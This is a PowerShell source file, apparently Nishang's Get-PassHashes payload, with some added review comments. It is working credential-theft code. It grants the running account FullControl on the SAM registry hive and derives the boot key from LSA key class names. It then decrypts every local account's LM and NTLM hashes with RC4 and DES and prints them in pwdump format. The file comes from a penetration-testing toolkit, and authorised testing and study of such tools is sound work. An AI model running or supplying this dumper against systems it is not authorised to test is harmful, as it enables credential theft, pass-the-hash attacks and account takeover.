  1. function Get-PassHashes {
  2. <#
  3. .SYNOPSIS
  4. Nishang payload which dumps password hashes.
  5.  
  6. .DESCRIPTION
The payload dumps password hashes using a modified version of the powerdump script from MSF. Administrator privileges are required for this script
(but not SYSTEM privileges, unlike the original powerdump written by David Kennedy): the script temporarily grants the calling account FullControl on HKLM\SAM\SAM\Domains and removes that grant when the dump completes.
  9.  
  10. .EXAMPLE
  11. PS > Get-PassHashes
  12. Run above from an elevated shell.
  13.  
  14.  
  15. .EXAMPLE
  16. PS > Get-PassHashes -PSObjectFormat
  17. Use above to receive the hashes output as a PSObject.
  18.  
  19. .LINK
  20. http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
  21. https://github.com/samratashok/nishang
  22.  
  23. .Notes
  24. Reflection added by https://github.com/Zer1t0
  25.  
  26. #>
[CmdletBinding()]
Param (
    # Emit one PSObject (Name/id/lm/ntlm) per account instead of pwdump-style text lines.
    [Switch]$PSObjectFormat
)

# Dynamically emitted type holding the advapi32 P/Invoke stubs; populated by LoadApi
# (called from DumpHashes) and consumed by Get-RegKeyClass.
$script:PowerDump = $null
  33. function LoadApi
  34. {
  35. # https://blogs.technet.microsoft.com/heyscriptingguy/2013/06/27/use-powershell-to-interact-with-the-windows-api-part-3/
  36. $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
  37. $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
  38. $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
  39. $TypeBuilder = $ModuleBuilder.DefineType('PowerDump', 'Public, Class')
  40.  
  41. #######################################################################
  42. # [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
  43. # public static extern int RegOpenKeyEx(int hKey, string subKey, int ulOptions, int samDesired, out int hkResult);
  44. $PInvokeMethod = $TypeBuilder.DefineMethod(
  45. 'RegOpenKeyEx',
  46. [Reflection.MethodAttributes] 'Public, Static',
  47. [int],
  48. [Type[]] @( [int], [string], [int], [int], [int].MakeByRefType())
  49. )
  50.  
  51. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  52.  
  53. $FieldArray = [Reflection.FieldInfo[]] @(
  54. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  55. [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
  56. )
  57. $FieldValueArray = [Object[]] @(
  58. 'RegOpenKeyEx',
  59. [Runtime.InteropServices.CharSet]::Auto
  60. )
  61.  
  62. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  63. $DllImportConstructor,
  64. @('advapi32.dll'),
  65. $FieldArray,
  66. $FieldValueArray
  67. )
  68. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  69. ##########################################################################
  70. #[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
  71. #extern public static int RegQueryInfoKey(int hkey, StringBuilder lpClass, ref int lpcbClass, int lpReserved, out int lpcSubKeys, out int lpcbMaxSubKeyLen, out int lpcbMaxClassLen, out int lpcValues, out int lpcbMaxValueNameLen, out int lpcbMaxValueLen, out int lpcbSecurityDescriptor, IntPtr lpftLastWriteTime);
  72. $PInvokeMethod = $TypeBuilder.DefineMethod(
  73. 'RegQueryInfoKey',
  74. [Reflection.MethodAttributes] 'Public, Static',
  75. [int],
  76. [Type[]] @( [int], [Text.Stringbuilder], [int].MakeByRefType(), [int], [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [IntPtr])
  77. )
  78.  
  79. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  80.  
  81. $FieldArray = [Reflection.FieldInfo[]] @(
  82. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  83. [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
  84. [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
  85. )
  86. $FieldValueArray = [Object[]] @(
  87. 'RegQueryInfoKey',
  88. [Runtime.InteropServices.CallingConvention]::Winapi,
  89. $true
  90. )
  91.  
  92. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  93. $DllImportConstructor,
  94. @('advapi32.dll'),
  95. $FieldArray,
  96. $FieldValueArray
  97. )
  98. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  99. ###############################################################################
  100. #[DllImport("advapi32.dll", SetLastError=true)]
  101. #public static extern int RegCloseKey(int hKey);
  102. $PInvokeMethod = $TypeBuilder.DefineMethod(
  103. 'RegCloseKey',
  104. [Reflection.MethodAttributes] 'Public, Static',
  105. [int],
  106. [Type[]] @( [int])
  107. )
  108.  
  109. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  110.  
  111. $FieldArray = [Reflection.FieldInfo[]] @(
  112. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  113. [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
  114. )
  115. $FieldValueArray = [Object[]] @(
  116. 'RegCloseKey',
  117. $true
  118. )
  119.  
  120. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  121. $DllImportConstructor,
  122. @('advapi32.dll'),
  123. $FieldArray,
  124. $FieldValueArray
  125. )
  126. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  127. ################################################################################
  128.  
  129. $script:PowerDump = $TypeBuilder.CreateType()
  130. }
  131.  
  132. #######################################powerdump written by David Kennedy#########################################
  133.  
# ---- constants shared by the SAM-decryption helpers below ----

# NUL-terminated ASCII strings mixed into the MD5 that derives the per-hash RC4 key
# in DecryptSingleHash: one for the NT hash, one for the LM hash.
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");

# Well-known LM / NT hashes of the empty password. DecryptHashes reports these when an
# account has no stored hash of that type, so output lines always carry both fields.
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);

# DES key odd-parity table. str_to_key indexes it with (7-bit key value * 2) and gets
# back the 8-bit key byte whose low bit is set so the byte has an odd number of 1 bits.
$odd_parity = @(
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);
  156.  
  157. function sid_to_key($sid)
  158. {
  159. $c0 = $sid -band 255
  160. $c1 = ($sid -band 65280)/256
  161. $c2 = ($sid -band 16711680)/65536
  162. $c3 = ($sid -band 4278190080)/16777216
  163.  
  164. $s1 = @($c0, $c1, $c2, $c3, $c0, $c1, $c2)
  165. $s2 = @($c3, $c0, $c1, $c2, $c3, $c0, $c1)
  166.  
  167. return ,((str_to_key $s1),(str_to_key $s2))
  168. }
  169.  
  170. function str_to_key($s)
  171. {
  172. $k0 = [int][math]::Floor($s[0] * 0.5)
  173. $k1 = ( $($s[0] -band 0x01) * 64) -bor [int][math]::Floor($s[1] * 0.25)
  174. $k2 = ( $($s[1] -band 0x03) * 32) -bor [int][math]::Floor($s[2] * 0.125)
  175. $k3 = ( $($s[2] -band 0x07) * 16) -bor [int][math]::Floor($s[3] * 0.0625)
  176. $k4 = ( $($s[3] -band 0x0F) * 8) -bor [int][math]::Floor($s[4] * 0.03125)
  177. $k5 = ( $($s[4] -band 0x1F) * 4) -bor [int][math]::Floor($s[5] * 0.015625)
  178. $k6 = ( $($s[5] -band 0x3F) * 2) -bor [int][math]::Floor($s[6] * 0.0078125)
  179. $k7 = $($s[6] -band 0x7F)
  180.  
  181. $key = @($k0, $k1, $k2, $k3, $k4, $k5, $k6, $k7)
  182.  
  183. 0..7 | %{
  184. $key[$_] = $odd_parity[($key[$_] * 2)]
  185. }
  186.  
  187. return ,$key
  188. }
  189.  
function NewRC4([byte[]]$key)
{
# Returns a small RC4 object: NoteProperties 'key' and 'S' (the permutation state),
# ScriptMethod init (key scheduling, run once) and ScriptMethod encrypt (keystream
# XOR). RC4 is symmetric, so encrypt is also used to decrypt. RC4 is not a design
# choice here: it is what the SAM format uses to protect the hash material.
return new-object Object |
Add-Member NoteProperty key $key -PassThru |
Add-Member NoteProperty S $null -PassThru |
Add-Member ScriptMethod init {
# Key-scheduling algorithm: S = identity permutation, then one swap per position
# driven by the key bytes (cycled with % key.Length). Only runs the first time.
if (-not $this.S)
{
[byte[]]$this.S = 0..255;
0..255 | % -begin{[long]$j=0;}{
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
}
}
} -PassThru |
Add-Member ScriptMethod "encrypt" {
# XORs $args[0] with the RC4 keystream and returns the result as a new byte array.
$data = $args[0];
$this.init();
$outbuf = new-object byte[] $($data.Length);
# Works on a copy of S so every call restarts the keystream from position 0
# (the original S is never advanced). NOTE(review): the range runs to S.Length,
# one past the last index; this relies on PowerShell dropping out-of-range
# indices from a range slice so $S2 still has 256 entries.
$S2 = $this.S[0..$this.S.Length];
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
# pseudo-random generation: swap S[i],S[j] and emit S[(S[i]+S[j]) mod 256]
$i = ($i+1) % $S2.Length;
$j = ($j + $S2[$i]) % $S2.Length;
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
$a = $data[$_];
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
$outbuf[$_] = ($a -bxor $b);
}
return ,$outbuf;
} -PassThru
}
  221.  
  222. function des_encrypt([byte[]]$data, [byte[]]$key)
  223. {
  224. return ,(des_transform $data $key $true)
  225. }
  226.  
  227. function des_decrypt([byte[]]$data, [byte[]]$key)
  228. {
  229. return ,(des_transform $data $key $false)
  230. }
  231.  
  232. function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
  233. {
  234. $des = new-object Security.Cryptography.DESCryptoServiceProvider;
  235. $des.Mode = [Security.Cryptography.CipherMode]::ECB;
  236. $des.Padding = [Security.Cryptography.PaddingMode]::None;
  237. $des.Key = $key;
  238. $des.IV = $key;
  239. $transform = $null;
  240. if ($doEncrypt) {$transform = $des.CreateEncryptor();}
  241. else{$transform = $des.CreateDecryptor();}
  242. $result = $transform.TransformFinalBlock($data, 0, $data.Length);
  243. return ,$result;
  244. }
  245.  
  246. function Get-RegKeyClass([string]$key, [string]$subkey)
  247. {
  248. switch ($Key) {
  249. "HKCR" { $nKey = 0x80000000} #HK Classes Root
  250. "HKCU" { $nKey = 0x80000001} #HK Current User
  251. "HKLM" { $nKey = 0x80000002} #HK Local Machine
  252. "HKU" { $nKey = 0x80000003} #HK Users
  253. "HKCC" { $nKey = 0x80000005} #HK Current Config
  254. default {
  255. throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
  256. }
  257. }
  258. $KEYQUERYVALUE = 0x1;
  259. $KEYREAD = 0x19;
  260. $KEYALLACCESS = 0x3F;
  261. $result = "";
  262. [int]$hkey=0
  263. if (-not $script:PowerDump::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
  264. {
  265. $classVal = New-Object Text.Stringbuilder 1024
  266. [int]$len = 1024
  267. if (-not $script:PowerDump::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
  268. [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
  269. {
  270. $result = $classVal.ToString()
  271. }
  272. else
  273. {
  274. Write-Error "RegQueryInfoKey failed";
  275. }
  276. $script:PowerDump::RegCloseKey($hkey) | Out-Null
  277. }
  278. else
  279. {
  280. Write-Error "Cannot open key";
  281. }
  282. return $result;
  283. }
  284.  
  285. function Get-BootKey
  286. {
  287. $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
  288. $b = new-object byte[] $($s.Length/2);
  289. 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
  290. $b2 = new-object byte[] 16;
  291. 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
  292. return ,$b2;
  293. }
  294.  
  295. function Get-HBootKey
  296. {
  297. param([byte[]]$bootkey);
  298. $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
  299. $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
  300. $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
  301. if (-not $k) {return $null}
  302. [byte[]]$F = $k.GetValue("F");
  303. if (-not $F) {return $null}
  304. $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
  305. $rc4 = NewRC4 $rc4key;
  306. return ,($rc4.encrypt($F[0x80..0x9F]));
  307. }
  308.  
  309. function Get-UserName([byte[]]$V)
  310. {
  311. if (-not $V) {return $null};
  312. $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
  313. $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
  314. return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
  315. }
  316.  
function Get-UserHashes($u, [byte[]]$hbootkey)
{
# Locates the encrypted LM and NT hashes inside a user's V value and hands them to
# DecryptHashes.
#   $u        - a user key object from Get-UserKeys (reads .V, .HashOffset and .Rid)
#   $hbootkey - hashed boot key from Get-HBootKey
# Returns @(lmhash, nthash) as produced by DecryptHashes (wrapped with ',').
# Layout assumed by the offsets below: each hash record is a 4-byte header followed
# by the 16-byte hash (20 bytes), records start at $u.HashOffset, and V[0xa0..0xa3] /
# V[0xac..0xaf] are the LM / NT record lengths — presumably; confirm against the SAM
# V-structure documentation.
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;

# check if hashes exist (if byte memory equals to 20, then we've got a hash)
# NOTE(review): comparing a 4-element slice with -eq yields the matching elements,
# so this test is true when ANY of the four bytes equals 20, not when the
# little-endian DWORD equals 20. Carried over from the original powerdump.
$LM_exists = $false;
$NT_exists = $false;
# LM header check
if ($u.V[0xa0..0xa3] -eq 20)
{
$LM_exists = $true;
}
# NT header check — only reached when no LM hash was detected, so $NT_exists is
# never set when $LM_exists is (the LM branch below reads both hashes itself)
elseif ($u.V[0xac..0xaf] -eq 20)
{
$NT_exists = $true;
}

if ($LM_exists -eq $true)
{
# LM hash follows its 4-byte header; NT hash follows the LM record (20 bytes) plus its own header
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}

elseif ($NT_exists -eq $true)
{
# no LM hash: only the two 4-byte headers precede the NT hash
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
# missing hashes stay $null and DecryptHashes substitutes the empty-password hash
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}
  350.  
  351. function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
  352. {
  353. [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
  354. # LM Hash
  355. if ($enc_lm_hash)
  356. {
  357. $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
  358. }
  359.  
  360. # NT Hash
  361. if ($enc_nt_hash)
  362. {
  363. $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
  364. }
  365.  
  366. return ,($lmhash,$nthash)
  367. }
  368.  
  369. function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
  370. {
  371. $deskeys = sid_to_key $rid;
  372. $md5 = [Security.Cryptography.MD5]::Create();
  373. $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
  374. $rc4 = NewRC4 $rc4_key;
  375. $obfkey = $rc4.encrypt($enc_hash);
  376. $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
  377. (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
  378. return ,$hash;
  379. }
  380.  
  381. function Get-UserKeys
  382. {
  383. ls HKLM:\SAM\SAM\Domains\Account\Users |
  384. where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
  385. Add-Member AliasProperty KeyName PSChildName -PassThru |
  386. Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
  387. Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
  388. Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
  389. Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
  390. }
  391.  
  392. function DumpHashes
  393. {
  394. LoadApi
  395. $bootkey = Get-BootKey;
  396. $hbootKey = Get-HBootKey $bootkey;
  397. Get-UserKeys | %{
  398. $hashes = Get-UserHashes $_ $hBootKey;
  399. if($PSObjectFormat)
  400. {
  401. $creds = New-Object psobject
  402. $creds | Add-Member -MemberType NoteProperty -Name Name -Value $_.Username
  403. $creds | Add-Member -MemberType NoteProperty -Name id -Value $_.Rid
  404. $creds | Add-Member -MemberType NoteProperty -Name lm -Value ([BitConverter]::ToString($hashes[0])).Replace("-","").ToLower()
  405. $creds | Add-Member -MemberType NoteProperty -Name ntlm -Value ([BitConverter]::ToString($hashes[1])).Replace("-","").ToLower()
  406. $creds
  407. }
  408. else
  409. {
  410. "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
  411. [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
  412. [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
  413. }
  414. }
  415. }
  416.  
  417. #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
  418. if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
  419. {
  420. Write-Warning "Script requires elevated or administrative privileges."
  421. Return
  422. }
  423. else
  424. {
  425. #Set permissions for the current user.
  426. $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
  427. [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
  428. "FullControl",
  429. [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
  430. [System.Security.AccessControl.PropagationFlags]"None",
  431. [System.Security.AccessControl.AccessControlType]"Allow")
  432. $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
  433. "SAM\SAM\Domains",
  434. [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
  435. [System.Security.AccessControl.RegistryRights]::ChangePermissions)
  436. $acl = $key.GetAccessControl()
  437. $acl.SetAccessRule($rule)
  438. $key.SetAccessControl($acl)
  439.  
  440. DumpHashes
  441.  
  442. #Remove the permissions added above.
  443. $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
  444. $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
  445. Set-Acl HKLM:\SAM\SAM\Domains $acl
  446.  
  447. }
  448. }